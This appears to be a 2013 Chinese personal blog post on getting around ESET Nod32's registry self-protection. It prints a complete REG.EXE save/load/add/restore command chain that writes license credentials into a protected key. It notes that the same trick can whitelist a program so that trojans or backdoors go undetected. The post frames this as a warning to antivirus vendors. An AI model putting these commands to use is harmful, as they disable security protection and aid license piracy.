DZF's Blog

杀软本来就不能保证安全(2)

最近看了下Nod32的某自动更新ID的软件，学习了它的写入注册表的方法了。
较新版本的Nod32安装后，一般的办法是不能编辑 HKLM\SOFTWARE\ESET\ESET Security\CurrentVersion\Plugins\01000400\Profiles\@My profile 的，而那些自动更新ID的软件的方法是：
把要写入的内容先写入到注册表实体文件（Registry Hive）中，然后再载入到系统注册表来合并(参考1，2)。即运行：

"C:\WINDOWS\system32\cmd.exe" /c "REG.EXE SAVE "HKLM\SOFTWARE\ESET\ESET Security\CurrentVersion\Plugins\01000400" "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ESET_REG_01000400_SAVED.HIV"&REG.EXE LOAD "HKLM\MY_ESET_01000400" "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ESET_REG_01000400_SAVED.HIV"&REG.EXE ADD "HKLM\MY_ESET_01000400\Profiles\@My profile" /f /v Username /t REG_SZ /d "EAV-88888888"&REG.EXE ADD "HKLM\MY_ESET_01000400\Profiles\@My profile" /f /v Password /t REG_BINARY /d "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"&REG.EXE SAVE "HKLM\MY_ESET_01000400" "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ESET_REG_01000400_SAVED_.HIV"&REG.EXE UNLOAD "HKLM\MY_ESET_01000400"&REG.EXE RESTORE "HKLM\SOFTWARE\ESET\ESET Security\CurrentVersion\Plugins\01000400" "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ESET_REG_01000400_SAVED_.HIV""

"C:\WINDOWS\system32\cmd.exe" /c "REG.EXE SAVE "HKLM\SOFTWARE\ESET\ESET Security\CurrentVersion\Plugins\01000400" "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ESET_REG_01000400_SAVED.HIV"&REG.EXE LOAD "HKLM\MY_ESET_01000400" "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ESET_REG_01000400_SAVED.HIV"&REG.EXE ADD "HKLM\MY_ESET_01000400\Profiles\@My profile" /f /v Username /t REG_SZ /d "EAV-88888888"&REG.EXE ADD "HKLM\MY_ESET_01000400\Profiles\@My profile" /f /v Password /t REG_BINARY /d "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"&REG.EXE SAVE "HKLM\MY_ESET_01000400" "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ESET_REG_01000400_SAVED_.HIV"&REG.EXE UNLOAD "HKLM\MY_ESET_01000400"&REG.EXE RESTORE "HKLM\SOFTWARE\ESET\ESET Security\CurrentVersion\Plugins\01000400" "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ESET_REG_01000400_SAVED_.HIV""

拆分为以下几行：

"C:\WINDOWS\system32\cmd.exe" /c "REG.EXE SAVE "HKLM\SOFTWARE\ESET\ESET Security\CurrentVersion\Plugins\01000400" "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ESET_REG_01000400_SAVED.HIV" & 
REG.EXE LOAD "HKLM\MY_ESET_01000400" "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ESET_REG_01000400_SAVED.HIV" & 
REG.EXE ADD "HKLM\MY_ESET_01000400\Profiles\@My profile" /f /v Username /t REG_SZ /d "EAV-88888888" & 
REG.EXE ADD "HKLM\MY_ESET_01000400\Profiles\@My profile" /f /v Password /t REG_BINARY /d "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & 
REG.EXE SAVE "HKLM\MY_ESET_01000400" "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ESET_REG_01000400_SAVED_.HIV" & 
REG.EXE UNLOAD "HKLM\MY_ESET_01000400" & 
REG.EXE RESTORE "HKLM\SOFTWARE\ESET\ESET Security\CurrentVersion\Plugins\01000400" "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ESET_REG_01000400_SAVED_.HIV""

"C:\WINDOWS\system32\cmd.exe" /c "REG.EXE SAVE "HKLM\SOFTWARE\ESET\ESET Security\CurrentVersion\Plugins\01000400" "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ESET_REG_01000400_SAVED.HIV" &

REG.EXE LOAD "HKLM\MY_ESET_01000400" "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ESET_REG_01000400_SAVED.HIV" &

REG.EXE ADD "HKLM\MY_ESET_01000400\Profiles\@My profile" /f /v Username /t REG_SZ /d "EAV-88888888" &

REG.EXE ADD "HKLM\MY_ESET_01000400\Profiles\@My profile" /f /v Password /t REG_BINARY /d "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" &

REG.EXE SAVE "HKLM\MY_ESET_01000400" "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ESET_REG_01000400_SAVED_.HIV" &

REG.EXE UNLOAD "HKLM\MY_ESET_01000400" &

REG.EXE RESTORE "HKLM\SOFTWARE\ESET\ESET Security\CurrentVersion\Plugins\01000400" "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ESET_REG_01000400_SAVED_.HIV""

操作都一目了然。同样，要把自己的程序添加到Nod32的白名单里，就是用上面的方法编辑 HKLM\MY_ESET_01000600\Profiles\@My profile\Excludes\Node_00000000 即可。要放木马、开后门，想干什么Nod32都不会过问了。

所以呢，那些把重要设置保存在注册表的杀软，该注意了。

发表评论 | Trackback

2013年2月11日 | 归档于 Hack

标签: ESET, Nod32, REG

« 复旦又亮了 OSCCA威武 »

本文目前尚无任何评论.

杀软本来就不能保证安全(2)

发表评论

标签

分类目录

近期文章

近期评论

文章归档

链接表

功能

页面

Counter